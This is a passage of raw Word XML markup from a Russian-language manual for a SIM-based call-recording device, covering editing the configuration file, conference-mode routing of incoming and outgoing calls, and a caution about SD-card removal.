          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>Для</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">изменения </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>настроек записи</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>необходимо  отре</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>дактировать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>файл</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(используя </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>любой текстовый редактор   либо   программу  «Блокнот»  Windows)</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>и сохранить его на карте (кодировка ANSI Windows-1251). Но</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">вые настройки будут установлены </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">при установке  карты  в  устройство.  Если  настройки установлены </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>неверно,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">то </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>при установке карты после</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>инициализации</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>светодиод</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>раза</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>мигнет</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>красным цветом,</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>будут  установлены</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>настройки</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>по</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>умолчанию</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>запишется</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>файл настроек по умолчанию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="009576B9" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_TOC_250008"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="009576B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запись перед началом работы установите в файле конфигурации (cfg.ini) номер вашего телефона.</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Входящие звонки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1413"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>Во время входящего звонка вызывающий абонент устанавливается на удержание.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1386"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>Производится вызов номера, указанного в файле</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="62"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>конфигурации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1398"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>После установки соединения произойдет автоматическое соединение с удаленным</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>абонентом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Исходящие</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>звонки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1386"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t xml:space="preserve">Набрать номер устройства </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>записи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1444"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>После установления соединения провести набор номера с помощью мобильного</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>телефона.</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>Для</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>ускоренного</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>набора</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>конце</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>необходимо</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>нажать</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>“#”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1386"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>Соединение с устройством записи перейдет в режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="65"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>удержания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1498"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>После установки соединения с удаленным абонентом произойдет автоматическое</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>соединение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2885"/>
          <w:tab w:val="left" w:pos="4307"/>
          <w:tab w:val="left" w:pos="4729"/>
          <w:tab w:val="left" w:pos="6008"/>
          <w:tab w:val="left" w:pos="8113"/>
          <w:tab w:val="left" w:pos="9980"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Устройство</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>работает</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>режиме</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>конференции,</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>необходимо</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>чтобы</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rPr>
        <w:t>SIM</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-карта, установленная в устройство, поддерживала режим конференции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="009576B9" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_TOC_250007"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="009576B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Хранение данных на SD-карте</w:t>
      </w:r>
      <w:r w:rsidRPr="009576B9">
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidRPr="009576B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>памяти</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2827"/>
          <w:tab w:val="left" w:pos="4856"/>
          <w:tab w:val="left" w:pos="6133"/>
          <w:tab w:val="left" w:pos="7561"/>
          <w:tab w:val="left" w:pos="8276"/>
          <w:tab w:val="left" w:pos="9518"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Внимание!</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Извлечение</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>карты</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>памяти</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>во</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>время</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>записи может</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>повлечь повреждение записей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
